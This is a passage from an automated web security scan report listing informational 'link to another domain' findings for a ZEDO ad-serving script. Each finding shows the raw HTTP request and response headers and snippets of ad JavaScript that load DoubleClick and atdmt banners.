Set-Cookie: FFad=19:17:17:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=123
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:18 GMT
Connection: close
Content-Length: 2152

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4610.Dogtime/B5236856.2;sz=160x600;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=904952%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=19%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=19%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D64%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.214. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.3028095578314561 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=32:32:31:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:2,1,1:0,1,1;expires=Tue, 24 May 2011 16:49:10 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=32:32:32:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=71
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:10 GMT
Connection: close
Content-Length: 2680

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587464/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=931208%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=32%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=32%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.215. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.02906439259728172 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=63:53:51:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=52:63:53:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=61
Expires: Sun, 24 Apr 2011 16:51:54 GMT
Date: Sun, 24 Apr 2011 16:50:53 GMT
Connection: close
Content-Length: 2714

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587473/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=934861%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=52%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=52%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.216. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.3152086012271308 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=23:22:21:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:3,1,1:2,1,1:1,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:36 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=22:23:22:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=106
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:48:36 GMT
Connection: close
Content-Length: 2142

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4610.Dogtime/B5083466.8;sz=300x250;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=903895%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=22%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=22%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bo%3D20%3By%3D64%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.217. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.11769822893408416 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1; FFgeo=2241452; FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFad=5:4:1:0; ZEDOIDA=xlO0TcGt89Z-t7Q0A2jzc9p9~042411; ZEDOIDX=21; FFCap=1574B809,210841,210133,210132,204732,204731|1,1,1:0,1,1:0,1,1:0,1,1:1,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210841,210133,210132,204732,204731|1,1,1:0,1,1:0,1,1:0,1,1:2,1,1;expires=Tue, 24 May 2011 16:46:23 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:5:4:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=238
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:23 GMT
Connection: close
Content-Length: 2138

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.dogtimemedia.comOX6462/B5304363.10;sz=160x600;pc=[TPAS_ID];;click=http://yads.zedo.com/ads2/c?a=911254%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=2%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=2%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bo%3D20%3By%3D5%3Bv%3D1%3Bt%3Dr%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.218. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.19031711392003725 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=8:7:9:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174|2,1,1:1,1,1:1,1,1:0,1,1:2,1,1:2,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174|2,1,1:1,1,1:2,1,1:0,1,1:2,1,1:2,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:47:25 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=10:8:7:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=176
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:47:25 GMT
Connection: close
Content-Length: 2690

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587463/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=931206%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=10%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=10%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.219. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.4066972996989712 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=6:4:3:None; FFCap=1574B809,210132,210841,210128,204732,204731|2,1,1:1,1,1:1,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133|2,1,1:1,1,1:1,1,1:0,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:47:14 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=4:6:4:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=187
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:47:14 GMT
Connection: close
Content-Length: 2672

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587468/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=931215%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=4%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=4%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.220. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.051862519411162766 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=48:53:48:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=49:48:53:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=105
Expires: Sun, 24 Apr 2011 16:51:54 GMT
Date: Sun, 24 Apr 2011 16:50:09 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=49%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=49%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.221. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.8724388342010683 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=25:24:25:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:0,1,1:1,1,1:2,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:42 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=26:25:24:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=99
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:42 GMT
Connection: close
Content-Length: 2124

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3271.dogtimemedia.com/B5314413.11;sz=160x600;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=921884%3Bn=809%3Bx=1813%3Bc=809001050,809001050%3Bg=172%3Bi=26%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=26%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.222. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.23164392112698556 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=45:49:45:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=46:45:49:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=112
Expires: Sun, 24 Apr 2011 16:51:55 GMT
Date: Sun, 24 Apr 2011 16:50:03 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=46%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=46%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.223. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.13874236844038118 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
